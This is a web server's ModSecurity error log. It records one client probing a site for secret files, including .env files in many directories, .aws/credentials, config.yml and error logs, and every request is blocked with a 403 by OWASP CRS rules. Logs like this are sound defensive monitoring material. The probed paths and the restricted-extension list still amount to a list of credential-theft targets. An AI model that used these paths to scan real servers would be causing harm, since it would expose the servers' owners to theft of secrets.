[Sat Nov 29 01:24:41.097473 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aSo9STRmtvrSM4WZBRuJ5QAAAAs"]
[Sat Nov 29 01:24:41.097692 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aSo9STRmtvrSM4WZBRuJ5QAAAAs"]
[Sat Nov 29 01:24:41.097894 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aSo9STRmtvrSM4WZBRuJ5QAAAAs"]
[Sat Nov 29 01:24:41.558644 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/en/.env"] [unique_id "aSo9SVonenFtamV5yHYc7wAAAAI"]
[Sat Nov 29 01:24:41.558872 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/en/.env"] [unique_id "aSo9SVonenFtamV5yHYc7wAAAAI"]
[Sat Nov 29 01:24:41.559068 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/en/.env"] [unique_id "aSo9SVonenFtamV5yHYc7wAAAAI"]
[Sat Nov 29 01:24:41.980343 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/administrator/.env"] [unique_id "aSo9STRmtvrSM4WZBRuJ5gAAAAs"]
[Sat Nov 29 01:24:41.980562 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/administrator/.env"] [unique_id "aSo9STRmtvrSM4WZBRuJ5gAAAAs"]
[Sat Nov 29 01:24:41.980764 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/administrator/.env"] [unique_id "aSo9STRmtvrSM4WZBRuJ5gAAAAs"]
[Sat Nov 29 01:24:41.982992 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "aSo9SVonenFtamV5yHYc8AAAAAI"]
[Sat Nov 29 01:24:41.983181 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "aSo9SVonenFtamV5yHYc8AAAAAI"]
[Sat Nov 29 01:24:41.983348 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "aSo9SVonenFtamV5yHYc8AAAAAI"]
[Sat Nov 29 01:24:42.602562 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/app.config"] [unique_id "aSo9SlonenFtamV5yHYc8QAAAAI"]
[Sat Nov 29 01:24:42.602867 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/app.config"] [unique_id "aSo9SlonenFtamV5yHYc8QAAAAI"]
[Sat Nov 29 01:24:42.603015 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/app.config"] [unique_id "aSo9SlonenFtamV5yHYc8QAAAAI"]
[Sat Nov 29 01:24:43.156862 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.config"] [unique_id "aSo9SzRmtvrSM4WZBRuJ5wAAAAs"]
[Sat Nov 29 01:24:43.157292 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.config"] [unique_id "aSo9SzRmtvrSM4WZBRuJ5wAAAAs"]
[Sat Nov 29 01:24:43.157491 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.config"] [unique_id "aSo9SzRmtvrSM4WZBRuJ5wAAAAs"]
[Sat Nov 29 01:24:43.838166 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/config/config.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/config.yml found within REQUEST_FILENAME: /config/config.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/config/config.yml"] [unique_id "aSo9S7VL27gtiM4DUrnKlgAAAAM"]
[Sat Nov 29 01:24:43.838413 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config/config.yml"] [unique_id "aSo9S7VL27gtiM4DUrnKlgAAAAM"]
[Sat Nov 29 01:24:43.838617 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config/config.yml"] [unique_id "aSo9S7VL27gtiM4DUrnKlgAAAAM"]
[Sat Nov 29 01:24:44.385046 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aSo9TFonenFtamV5yHYc8wAAAAI"]
[Sat Nov 29 01:24:44.385287 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aSo9TFonenFtamV5yHYc8wAAAAI"]
[Sat Nov 29 01:24:44.385492 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aSo9TFonenFtamV5yHYc8wAAAAI"]
[Sat Nov 29 01:24:48.475491 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "Dockerfile" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: Dockerfile found within REQUEST_FILENAME: /dockerfile"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/Dockerfile"] [unique_id "aSo9UFonenFtamV5yHYc9wAAAAI"]
[Sat Nov 29 01:24:48.475731 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/Dockerfile"] [unique_id "aSo9UFonenFtamV5yHYc9wAAAAI"]
[Sat Nov 29 01:24:48.475934 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/Dockerfile"] [unique_id "aSo9UFonenFtamV5yHYc9wAAAAI"]
[Sat Nov 29 01:24:50.562772 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/error.log"] [unique_id "aSo9UlonenFtamV5yHYc-QAAAAI"]
[Sat Nov 29 01:24:50.563119 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/error.log"] [unique_id "aSo9UlonenFtamV5yHYc-QAAAAI"]
[Sat Nov 29 01:24:50.563329 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/error.log"] [unique_id "aSo9UlonenFtamV5yHYc-QAAAAI"]
[Sat Nov 29 01:24:50.907475 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/php_error.log"] [unique_id "aSo9UrVL27gtiM4DUrnKnQAAAAM"]
[Sat Nov 29 01:24:50.907803 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/php_error.log"] [unique_id "aSo9UrVL27gtiM4DUrnKnQAAAAM"]
[Sat Nov 29 01:24:50.908009 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/php_error.log"] [unique_id "aSo9UrVL27gtiM4DUrnKnQAAAAM"]
[Sat Nov 29 01:24:51.481536 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/psnlink/.env"] [unique_id "aSo9U7VL27gtiM4DUrnKngAAAAM"]
[Sat Nov 29 01:24:51.481767 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/psnlink/.env"] [unique_id "aSo9U7VL27gtiM4DUrnKngAAAAM"]
[Sat Nov 29 01:24:51.481972 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/psnlink/.env"] [unique_id "aSo9U7VL27gtiM4DUrnKngAAAAM"]
[Sat Nov 29 01:24:51.989471 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/v1/.env"] [unique_id "aSo9U1onenFtamV5yHYc-gAAAAI"]
[Sat Nov 29 01:24:51.989682 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/v1/.env"] [unique_id "aSo9U1onenFtamV5yHYc-gAAAAI"]
